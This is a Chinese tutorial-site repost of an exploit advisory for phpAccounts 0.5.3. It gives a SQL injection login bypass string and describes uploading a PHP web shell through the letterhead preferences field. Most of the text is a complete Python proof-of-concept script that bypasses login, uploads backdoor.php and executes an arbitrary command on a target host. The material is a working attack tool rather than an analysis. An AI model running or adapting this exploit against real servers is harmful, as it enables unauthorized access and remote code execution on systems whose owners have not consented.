网站地图    收藏   

子栏目

主页 > 后端 > 网站安全 >

phpAcounts v.0.5.3 SQL注射及修复 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-17 14:11 作者: 阅读:

[导读] 标题phpAcounts v.0.5.3 SQL Injection作者: loneferret影响版本: 0.5.3开发者地址: http://phpaccounts.com/测试平台: Ubuntu Server 11.10# Old app, still fun.Auth. Bypass:http://www.2cto.c......

标题 phpAcounts v.0.5.3 SQL Injection 
 
作者: loneferret 
 
影响版本: 0.5.3 
 
开发者地址: http://phpaccounts.com/ 
 
测试平台: Ubuntu Server 11.10 
  
# Old app, still fun. 
 
  
 
Auth. Bypass: 
 
http://www.2cto.com /phpaccounts/index.php 
 
Username: x' or '1'='1'# 
 
Password: <whatever> 
 
  
 
Upload php shell in preferences  
 
Letterhead image upload does not sanitize file extensions. 
 
http://server/index.php?page=tasks&action=preferences 
 
  
 
Acess shell: 
 
Where '1' is the user's ID. 
 
http://server/phpaccounts/users/1/<filename> 
 
   
---- Python PoC ---------
 
  
 
#!/usr/bin/python 
 
  
 
import re, mechanize 
 
import urllib, sys 
 
  
 
print "\n[*] phpAcounts v.0.5.3 Remote Code Execution"
 
print "[*] Vulnerability discovered by loneferret"
 
  
 
print "[*] Offensive Security - http://www.offensive-security.com\n"
 
if (len(sys.argv) != 3): 
 
    print "[*] Usage: poc.py <RHOST> <RCMD>"
 
    exit(0) 
 
  
 
rhost = sys.argv[1] 
 
rcmd = sys.argv[2] 
 
  
 
  
 
print "[*] Bypassing Login ."
 
try: 
 
        br = mechanize.Browser() 
 
        br.open("http://%s/phpaccounts/index.php?frameset=true" % rhost) 
 
        assert br.viewing_html() 
 
        br.select_form(name="loginForm") 
 
        br.select_form(nr=0) 
 
        br.form['Login_Username'] = "x' or '1'#"
 
        br.form['Login_Password'] = "pwnd"
 
        print "[*] Triggering SQLi .."
 
        br.submit() 
 
except: 
 
        print "[*] Oups..Something happened"
 
        exit(0) 
 
  
 
print "[*] Uploading Shell ..."
 
try: 
 
        br.open("http://%s/phpaccounts/index.php?page=tasks&action=preferences" % rhost) 
 
        assert br.viewing_html() 
 
        br.select_form(nr=0) 
 
        br.form["Preferences[LETTER_HEADER]"] = 'test'
 
        br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="letterhead_image") 
 
        br.submit(nr=2) 
 
except: 
 
        print "[*] Upload didn't work"
 
        exit(0) 
 
  
 
print "[*] Command Executed\n"
 
try:  www.2cto.com
 
        shell = urllib.urlopen("http://%s/phpaccounts/users/1/backdoor.php?cmd=%s" % (rhost,rcmd)) 
 
        print shell.read() 
 
except: 
 
        print "[*] Oups."
 
        exit(0)

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论